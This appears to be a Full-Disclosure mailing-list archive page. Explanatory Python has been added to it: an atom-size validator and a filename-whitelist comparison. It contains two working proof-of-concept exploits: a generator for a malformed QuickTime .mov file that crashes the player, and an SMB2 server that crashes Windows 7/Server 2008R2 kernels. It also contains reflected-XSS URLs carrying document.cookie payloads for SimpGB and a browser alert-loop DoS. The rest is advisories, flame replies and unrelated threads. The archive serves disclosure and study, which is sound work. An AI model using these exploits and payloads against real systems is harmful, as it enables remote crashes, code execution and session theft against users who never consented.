> #Faulting Instruction:66830f9b push ebx
> #
> #Basic Block:
> #66830f9b push ebx
> #   Tainted Input Operands: ebx
> #66830f9c push ebp
> #66830f9d mov ebp,dword ptr +0x41f (0420)[esp]
>
> #66830fa4 push esi
> #66830fa5 push edi
> #66830fa6 mov edi,ecx
> #66830fa8 cmp edi,offset +0x5ff (0600)
> #66830fae mov ebx,edx
> #66830fb0 mov dword ptr [esp+14h],eax
>
> #66830fb4 mov byte ptr [esp+10h],0
> #66830fb9 mov byte ptr [esp+11h],0
> #66830fbe mov byte ptr [esp+12h],0
> #66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4)
> #
> #Exception Hash (Major/Minor): 0x614b6671.0x614b786e
>
> #
> #Stack Trace:
> #QuickTime!DllMain+0x2fabb
> #+0x1231137
> #Instruction Address: 0x66830f9b
> #
> #Description: Stack Overflow
> #Short Description: StackOverflow
> #Exploitability Classification: UNKNOWN
>
> #Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb 
> (Hash=0x614b6671.0x614b786e)
>
> print "--"
> print "w3bd3vil [at] gmail [dot] com"
> print "Apple QuickTime CRGN Atom 0day"
>
> print "--"
> bytes = [
> 0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70,
> 0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67,
> 0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00,
>
> 0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00,
> 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02,
> 0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
>
> 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
>
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
> 0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B,
> 0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF,
>
> 0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
>
> 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00,
> 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63,
>
> 0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00,
> 0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00,
>
> 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72,
> 0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ]
>
> f = open("webDEViL.mov", "wb")
> f.write(bytearray(bytes))   # write the atom list as raw bytes (Python 2 and 3)
>
> f.close()
> print("webDEViL.mov created! (%d bytes)" % len(bytes))
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
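webDEViL's generator emits a fixed byte string, so the listing alone does not show what is malformed about the 'clip' atom. The Python 3 example below is added here and is not part of either post or of QuickTime: a minimal atom-tree walker that checks every atom's size against its container, run over the PoC's 'clip' atom (copied byte for byte from the generator) wrapped in constructed ftyp/moov/trak atoms. The set of container atom types and the 'crgn' payload used in the well-formed comparison are assumptions of this example; size values 0 and 1 (to-end-of-file and 64-bit size) are deliberately treated as errors rather than handled.

```python
import struct

# Atom types this example descends into (an assumed subset of QuickTime containers).
CONTAINERS = {b"moov", b"trak", b"edts", b"clip", b"mdia", b"minf", b"stbl"}


def atom(kind, payload):
    """Encode one atom: 32-bit big-endian size (header included) + 4-byte type."""
    return struct.pack(">I4s", 8 + len(payload), kind) + payload


def validate(data, start=0, end=None, depth=0, atoms=None, problems=None):
    """Walk the atom tree in data[start:end]; return (atoms, problems) where
    atoms lists (depth, type, size) and problems lists every size that does
    not fit the container it sits in."""
    if end is None:
        end = len(data)
    if atoms is None:
        atoms, problems = [], []
    pos = start
    while pos < end:
        if end - pos < 8:
            problems.append("offset %d: %d stray bytes, too few for an atom header"
                            % (pos, end - pos))
            break
        size, kind = struct.unpack_from(">I4s", data, pos)
        # size 0 and 1 are legal QuickTime encodings (to end of file, 64-bit
        # size) that this example does not accept.
        if size < 8:
            problems.append("offset %d: atom %r has size %d, smaller than its header"
                            % (pos, kind, size))
            break
        if pos + size > end:
            problems.append("offset %d: atom %r claims %d bytes but only %d remain"
                            % (pos, kind, size, end - pos))
            break
        atoms.append((depth, kind, size))
        if kind in CONTAINERS:
            validate(data, pos + 8, pos + size, depth + 1, atoms, problems)
        pos += size
    return atoms, problems


# 'clip' atom copied byte for byte from the generator in the quoted post.
POC_CLIP = bytes([
    0x00, 0x00, 0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70,   # size 26, 'clip'
    0x00, 0x00, 0x00, 0x0E, 0x63, 0x72, 0x67, 0xFF,   # size 14, type 'crg\xff'
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,               # its 6 payload bytes
    0xFF, 0xFF, 0xFF, 0xFF,                           # 4 bytes no atom accounts for
])

FTYP = atom(b"ftyp", b"3gp5" + b"\x00\x00\x01\x00" + b"3gp5" + b"3gp4")

# Constructed minimal wrappers (not the full PoC file) around that clip atom.
POC_FILE = FTYP + atom(b"moov", atom(b"trak", POC_CLIP))

# Same layout with a well-formed clipping-region atom for comparison (payload assumed).
GOOD_FILE = FTYP + atom(b"moov", atom(b"trak", atom(b"clip", atom(b"crgn", b"\x00" * 10))))

if __name__ == "__main__":
    atoms, problems = validate(POC_FILE)
    for depth, kind, size in atoms:
        print("  " * depth + "%r %d" % (kind, size))
    for problem in problems:
        print(problem)
```

The walk reaches a 'crg\xff' atom of 14 bytes inside the 26-byte 'clip' and then finds four bytes that cannot hold an atom header, which is exactly the spot a parser that trusts sizes will read past; the well-formed file produces no findings.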

Re: [Full-disclosure] [Security-news] SA-CORE-2012-004 - Drupal core - Multiple vulnerabilities

2012-12-19 Thread laurent gaffie
In regards to the code exec;
Ever heard of whitelisting?
On 19 Dec 2012 14:39,  wrote:

> View online: http://drupal.org/SA-CORE-2012-004
>
>   * Advisory ID: DRUPAL-SA-CORE-2012-004
>   * Project: Drupal core [1]
>   * Version: 6.x, 7.x
>   * Date: 2012-December-19
>   * Security risk: Moderately critical [2]
>   * Exploitable from: Remote
>   * Vulnerability: Access bypass, Arbitrary PHP code execution
>
>  DESCRIPTION
> -
>
> Multiple vulnerabilities were fixed in the supported Drupal core versions 6
> and 7.
>
>  Access bypass (User module search - Drupal 6 and 7)
>
> A vulnerability was identified that allows blocked users to appear in user
> search results, even when the search results are viewed by unprivileged
> users.
>
> This vulnerability is mitigated by the fact that the default Drupal core user
> search results only display usernames (and disclosure of usernames is not
> considered a security vulnerability [3]). However, since modules or themes
> may override the search results to display more information from each user's
> profile, this could result in additional information about blocked users
> being disclosed on some sites.
>
> CVE: Requested.
>
>  Access bypass (Upload module - Drupal 6)
>
> A vulnerability was identified that allows information about uploaded files
> to be displayed in RSS feeds and search results to users that do not have the
> "view uploaded files" permission.
>
> This issue affects Drupal 6 only.
>
> CVE: Requested.
>
>  Arbitrary PHP code execution (File upload modules - Drupal 6 and 7)
>
> Drupal core's file upload feature blocks the upload of many files that can be
> executed on the server by munging the filename. A malicious user could name a
> file in a manner that bypasses this munging of the filename in Drupal's input
> validation.
>
> This vulnerability is mitigated by several factors: The attacker would need
> the permission to upload a file to the server. Certain combinations of PHP
> and filesystems are not vulnerable to this issue, though we did not perform
> an exhaustive review of the supported PHP versions. Finally: the server would
> need to allow execution of files in the uploads directory. Drupal core has
> protected against this with a .htaccess file protection in place from
> SA-2006-006 - Drupal Core - Execution of arbitrary files in certain Apache
> configurations [4]. Users of IIS should consider updating their web.config
> [5]. Users of Nginx should confirm that only the index.php and other known
> good scripts are executable. Users of other webservers should review their
> configuration to ensure the goals are achieved in some other way.
>
> CVE: Requested.
>
>
>  CVE IDENTIFIER(S) ISSUED
> 
>
>   * /A CVE identifier [6] will be requested, and added upon issuance, in
> accordance with Drupal Security Team processes./
>
>  VERSIONS AFFECTED
> ---
>
>   * Drupal core 6.x versions prior to 6.27.
>   * Drupal core 7.x versions prior to 7.18.
>
>  SOLUTION
> 
>
> Install the latest version:
>
>   * If you use Drupal 6.x, upgrade to Drupal core 6.27 [7].
>   * If you use Drupal 7.x, upgrade to Drupal core 7.18 [8].
>
> Also see the Drupal core [9] project page.
>
>  REPORTED BY
> -
>
>   * The access bypass issue in the User module search results was reported by
> Derek Wright [10] of the Drupal Security Team.
>   * The access bypass issue in the Drupal 6 Upload module was reported by
> Simon Rycroft [11], and by Damien Tournoud [12] of the Drupal Security Team.
>   * The arbitrary code execution issue was reported by Amit Asaravala [13].
>
>  FIXED BY
> 
>
>   * The access bypass issue in the User module search results was fixed by
> Derek Wright [14], Ivo Van Geertruyen [15], Peter Wolanin [16], and David
> Rothstein [17], all members of the Drupal Security Team.
>   * The access bypass issue in the Drupal 6 Upload module was fixed by
> Michaël Dupont [18], and by Fox [19] and David Rothstein [20] of the
> Drupal Security Team.
>   * The arbitrary code execution issue was fixed by Nathan Haug [21] and
> Justin Klein-Keane [22], and by John Morahan [23] and Greg Knaddison [24]
> of the Drupal Security team.
>
>  COORDINATED BY
> --
>
>   * Jeremy Thorson [25] QA/Testing infrastructure
>   * Ben Jeavons [26] of the Drupal Security Team
>   * David Rothstein [27] of the Drupal Security Team
>   * Gábor Hojtsy [28] of the Drupal Security Team
>   * Greg Knaddison [29] of the Drupal Security Team
>   * Fox [30] of the Drupal Security Team
>
> 
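The advisory describes blocking executable uploads by munging the filename, and the reply asks why not whitelist instead. The Python 3 example below is added here and is not Drupal code: a weak last-extension check, next to an underscore-inserting munge (modelled on the behaviour I know from Drupal's file_munge_filename(), which the advisory itself does not spell out), next to a strict whitelist that rejects any name carrying an extension outside the allowed set. The allowed-extension list is an assumption.

```python
# Assumed whitelist; a real site would take this from its upload settings.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}


def last_extension_only(filename, allowed=ALLOWED_EXTENSIONS):
    """Weak check: inspects only the final extension, so 'shell.php.jpg' passes
    although some Apache configurations act on every extension in the name."""
    if "." not in filename:
        return False
    return filename.rsplit(".", 1)[1].lower() in allowed


def munge_filename(filename, allowed=ALLOWED_EXTENSIONS):
    """Blacklist-style repair: each extension segment that is not whitelisted
    gets an underscore appended, so 'shell.php.jpg' becomes 'shell.php_.jpg'
    and the server no longer sees a '.php' segment. The name is kept, rewritten."""
    base, *exts = filename.split(".")
    return ".".join([base] + [e if e.lower() in allowed else e + "_" for e in exts])


def whitelist_filename(filename, allowed=ALLOWED_EXTENSIONS):
    """Strict check: accept only when there is a non-empty base name and every
    extension segment after it is whitelisted; nothing is rewritten, anything
    else (dotfiles, trailing dots, unknown extensions anywhere) is rejected."""
    base, *exts = filename.split(".")
    return bool(base) and bool(exts) and all(e.lower() in allowed for e in exts)


if __name__ == "__main__":
    # Constructed sample names, including the multi-extension case the advisory hints at.
    for name in ("photo.JPG", "shell.php", "shell.php.jpg", ".htaccess", "photo.", "README"):
        print("%-14s last-ext=%-5s munged=%-16s whitelist=%s" % (
            name, last_extension_only(name), munge_filename(name), whitelist_filename(name)))
```

The munge keeps a name like shell.php_.jpg on disk and relies on the web server never treating "php_" as a handler; the whitelist refuses the upload outright, which is the point of the reply: there is nothing left for a clever filename to bypass.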

[Full-disclosure] SANS PHP Port Scanner Remote Code Execution

2013-03-05 Thread laurent gaffie
http://resources.infosecinstitute.com/php-build-your-own-mini-port-scanner/

Finding the vulnerability in this code is left as an exercise to the reader.

PS: "*Your comment will be awaiting moderation forever."*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution

2013-03-05 Thread laurent gaffie
The question is not about someone making a mistake; everyone makes mistakes one
day or another. The question is about not even doing QA on a corporate blog
post (contribution or not) where you sell training at $5k for BS certs.

2013/3/5 Harry Hoffman 

> lolz, that's great! I guess it shouldn't be surprising, he's a
> undergrad. But even most grad students make these sorts of mistakes...
> academicware ;-)
>
> Cheers,
> Harry
>
> On 03/05/2013 08:46 PM, laurent gaffie wrote:
> >
> http://resources.infosecinstitute.com/php-build-your-own-mini-port-scanner/
> >
> > Finding the vulnerability in this code is left as an exercise to the
> reader.
> >
> > PS: "*Your comment will be awaiting moderation forever."*
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Why PRISM kills the cloud | Computerworld Blogs

2013-06-10 Thread laurent gaffie
Why is the PRISM program such a big deal today? Most of us knew about
Echelon and the Patriot Act, didn't we? This program was unconstitutional in
the first place and should have raised indignation when it was approved at
that time...

Seems like some people spend way too much time focusing on the second
amendment rather than the first one...
On 2013-06-10 19:46, "Ivan .Heca"  wrote:

> http://m.blogs.computerworld.com/cloud-storage/22305/why-prism-kills-cloud
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Why PRISM kills the cloud | Computerworld Blogs

2013-06-12 Thread laurent gaffie
Freedom of speech and freedom of anonymous speech is protected by the first
amendment..

https://www.eff.org/issues/anonymity




2013/6/11 Philip Whitehouse 

>
> Seems like some people spend way to much time focusing on the second
> amendment rather than the first one...
>
> Well this relates mainly to the fourth amendment, not the first. The first
> tends to get decent coverage. Publication of the leak by journalists is the
> only under the realm of the first.
>
> Philip Whitehouse
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Dancho Danchev gone missing in Bulgaria

2011-01-17 Thread laurent gaffie
No sign at all he was crazy in the first place;
Question *could be* why is he supposed to be in a psychiatric hospital by now?
Anyway, who is the source on that one?
Who has a clue, and on what do we rely to have an opinion?
_Blah_ we'll probably never know.
Sounds like classic stuff here.


2011/1/18 Juha-Matti Laurio 

> He has been found:
> http://news.ycombinator.com/item?id=2112135
>
> via
> http://twitter.com/#!/mikkohypponen/status/27006162218000384
>
> Juha-Matti
>
> Jamie Riden [jamie.ri...@gmail.com] kirjoitti:
> > On 16 January 2011 22:28, jf  wrote:
> > > On Sat, Jan 15, 2011 at 07:45:30PM +, Joe Average wrote:
> > >> Via ZDNet:
> > >>
> > >> "Zero Day blogger and malware researcher Dancho Danchev has gone
> > >> missing since August last year and we have some troubling information
> > >> that suggests he may have been harmed in his native Bulgaria."
> > >>
> > >> "Dancho, who was relentless in his pursuit of cyber-criminals, last
> > >> blogged here on August 18.  His personal blog has not been updated
> > >> since September 11, 2010."
> > >>
> > >> More Information:
> > >>
> http://www.zdnet.com/blog/security/we-need-help-with-the-strange-disappearance-of-dancho-danchev/7897
> > >
> > > In soviet bulgaria, you not research malware author, malware author
> research you.
> >
> > Bulgaria joined the European Union in 2007 - see
> > http://europa.eu/abc/european_countries/eu_members/bulgaria/index_en.htm
> > Sorry to spoil the joke, but it's not like you can be disappeared at
> > will in Bulgaria these days.
> >
> > I met Dancho a couple of years ago, btw - nice bloke, and we'd all
> > like to know he's safe and well.
> >
> > cheers,
> >  Jamie
> > --
> > Jamie Riden / ja...@honeynet.org / jamie.ri...@gmail.com
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Multiple vulnerabilities in SimpGB

2011-01-26 Thread laurent gaffie
Send your shitty stuff to bugt...@securityfocus.com

If it's not obvious, no one gives a shit here, seriously.


2011/1/27 MustLive 

> Hello list!
>
> I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
> Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.
>
> -
> Affected products:
> -
>
> Vulnerable are SimpGB v1.49.02 and previous versions.
>
> --
> Details:
> --
>
> XSS (WASC-08):
>
> POST request at page http://site/guestbook.php in parameters poster,
> postingid and location in Preview function. If captcha is using in
> guestbook, then working code of the captcha is required for the attack. Or
> via GET request:
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=11&preview=preview
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=11&preview=preview
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=11&preview=preview
>
> Brute Force (WASC-11):
>
> http://site/admin/index.php
>
> Insufficient Anti-automation (WASC-21):
>
> http://site/admin/pwlost.php
>
> In this functionality there is no protection from automated requests
> (captcha).
>
> Abuse of Functionality (WASC-42):
>
> http://site/admin/pwlost.php
>
> In this functionality it's possible to retrieve logins.
>
> 
> Timeline:
> 
>
> 2010.11.17 - announced at my site.
> 2010.11.19 - informed developers.
> 2011.01.25 - disclosed at my site.
>
> I mentioned about these vulnerabilities at my site
> (http://websecurity.com.ua/4690/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] www.google.com xss vulnerability Using mhtml

2011-01-27 Thread laurent gaffie
Not a Google vuln.
Hunt down MSFT to pay for your bug.
Oh wait, they don't pay for free research.. 0noz, you won't get any candy!

2011/1/27, IEhrepus <5up3r...@gmail.com>:
> Security is general; many security issues are composed of many
> different vulnerabilities from different vendors.
>
> like " mhtml:http://www.google.com/gwt/n?u=[mhtml file url]! " this vuln
>
> 
> so we come back: this vuln needs two conditions
> 1. the www.google.com app doesn't filter the CRLF
> 2. IE supports the mhtml protocol handler to render the mhtml file format,
> and this is why mhtml: is designed
> --
>
> Both are indispensable. so google's vuln is that it doesn't take into
> account the security implications of using mhtml,
>
> the MS vuln is that "it does not honor Content-Type and related headers
> (or even "nosniff")." like MZ says
>
> GG and MS, both are vuln...
>
> in addition, if MS says this is mhtml:'s original function, so google
> is very dangerous to the user who is using IE
>
> Even if MS fixed it, how about the google users who do not have time
> to upgrade IE?
>
> by superhei
> hitest
>
>
>
> 2011/1/26 Michal Zalewski :
>>> 1.www.google.com app don't filter the CRLF
>>
>> This is not strictly required; there are other scenarios where this
>> vulnerability is exploitable.
>>
>>> 2.IE support mhtml protocol handler to render the mhtml file format,
>>> and this is the why mhtml: is designed
>>
>> The real problem is that when mhtml: is used to fetch the container
>> over an underlying protocol, it does not honor Content-Type and
>> related headers (or even "nosniff").
>>
>> /mz
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Multiple vulnerabilities in SimpGB

2011-02-04 Thread laurent gaffie
Hey Sparky,

One of the many, many things you didn't understand during the past 5 years is
that you should probably try to identify and fix your stuff on *your*
website, before spamming this ML with your crap.
cf:
http://www.zone-h.org/mirror/id/11367858

e-tard.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Turning SMB client side bug to server side

2010-04-16 Thread laurent gaffie
Here's a small technique to compromise the PDC/DMB via an SMB client-side
bug by abusing the Browser protocol, with no user interaction at all.

Browser and NBNS abuse has been well known for a long time, as these
protocols weren't developed with security in mind; this blog post is a
simple real-case example.

http://g-laurent.blogspot.com/2010/04/turning-smb-client-bug-to-server-side.html

Regards,
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Python fuzzing lib released

2010-05-12 Thread laurent gaffie
I'm pleased to release this Python fuzzing lib I've been working on for a
couple of months; it works perfectly for fuzzing any layer.
It works even better for layer 5 fuzzing, which lets you not care about many
things you have to care about when fuzzing lower-layer protocols...
This lib is pretty useful from my point of view, and could be wisely used
for any project;
http://g-laurent.blogspot.com/2010/05/fuzzing-lib-released.html

Enjoy  :)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DoS vulnerability in Internet Explorer

2010-06-01 Thread Laurent Gaffie
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hello Full-Disclosure!

I want to warn you about a Denial of Service in every browser finally !!!

It actually affects every browser with a JavaScript engine built in !!!

Adobe may be vulnerable to 

PoC :

<html>
<head><title>0n0z</title></head>
<body>
<script>
for (i=0;i<65535;i++) {
  alert("0n0z mustlive got you, now you're fucked, the only solution is to restart your browser or be faster than JS !!!");
}
</script>
</body>
</html>


Greetz to mustl...@oswap.com.ua


On 01/06/10 22:42, MustLive wrote:
> Hello Full-Disclosure!
>
> I want to warn you about Denial of Service vulnerability in
> Internet Explorer. Which I already disclosed at my site in 2008 (at
> 29.09.2008). But recently I made new tests concerning this
> vulnerability, so I decided to remind you about it.
>
> I know this vulnerability for a long time - it's well-known DoS in
> IE. It works in IE6 and after release of IE7 I hoped that Microsoft
> fixed this hole in seventh version of the browser. But as I tested at
> 29.09.2008, IE7 was also vulnerable to this attack. And as I tested
> recently, IE8 is also vulnerable to this attack.
>
> Also I informed Microsoft at 01.10.2008 about it, but they ignored
> and didn't fix it. They didn't fix the hole not in IE6, nor in IE7,
> nor in IE8.
>
> That time I published about this vulnerability at SecurityVulns
> (http://securityvulns.com/Udocument636.html).
>
> DoS:
>
> Vulnerability concerned with handling by browser of expression in
> styles, which leads to blocking of work of IE.
>
> http://websecurity.com.ua/uploads/2008/IE%20DoS%20Exploit4.html
>
> Vulnerable versions are Internet Explorer 6 (6.0.2900.2180),
> Internet Explorer 7 (7.0.6000.16711), Internet Explorer 8
> (8.0.7600.16385) and previous versions.
>
> To Susan Bradley from Bugtraq:
>
> This is one of those cases, which I told you before, when browser
> vendors ignore to fix DoS holes in their browsers for many years.
>
> Best wishes & regards, MustLive Administrator of Websecurity web
> site http://websecurity.com.ua
>
> ___ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>

0x09D391F0.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DoS vulnerability in Internet Explorer

2010-06-01 Thread Laurent Gaffie
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Sorry Mustlive,
I understand you need to see this in clear text finally.
I guess ASCII is the best way to communicate with you;


Hello Full-Disclosure!

I want to warn you about a Denial of Service in every browser finally !!!

It actually affects every browser with a JavaScript engine built in !!!

Adobe may be vulnerable to 

PoC :

<html>
<head><title>0n0z</title></head>
<body>
<script>
for (i=0;i<65535;i++) {
  alert("0n0z mustlive got you, now you're fucked, the only solution is to restart your browser or be faster than JS !!!");
}
</script>
</body>
</html>


Greetz to mustl...@oswap.com.ua




0x09D391F0.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Hash

2009-10-28 Thread laurent gaffie
Bonjour Fionnbharr Davies!,

I'm glad to make your life easier with the shasum full path, really.

Regarding the "grossly misdiagnosed bug";
Those are some funny words to describe one of the most difficult bugs to
exploit in 2009 (http://seclists.org/dailydave/2009/q4/2)




Laurent


Bonjour!

Is this going to be another grossly misdiagnosed bug?

Also I'm glad you put that /usr/bin at the start, it would have been
confusing otherwise.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Windows 7 , Server 2008R2 Remote Kernel Crash

2009-11-11 Thread laurent gaffie
=
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=

I. VULNERABILITY
-
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure OS Ever' --> Remote Kernel in 2 min.
#FAIL,#FAIL,#FAIL

III. DESCRIPTION
-
See http://g-laurent.blogspot.com/ for many more details.

#Comment: This bug is specific to Windows 7/2008R2.

IV. PROOF OF CONCEPT
-
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and Server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure()
#caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instant
#crash.
#Author: Laurent Gaffié
#

try:
    import SocketServer                      # Python 2
except ImportError:
    import socketserver as SocketServer      # Python 3

# NetBIOS session header followed by an SMB2 NEGOTIATE response. The NetBIOS
# length announces 0x9a bytes while 0x9e follow: that mismatch is the trigger.
packet = (b"\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
          b"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
          b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          b"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
          b"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
          b"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
          b"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
          b"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
          b"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):
        print("Who:", self.client_address)
        data = self.request.recv(1024)   # the target's NEGOTIATE request, ignored
        self.request.send(packet)        # answer with the malformed response
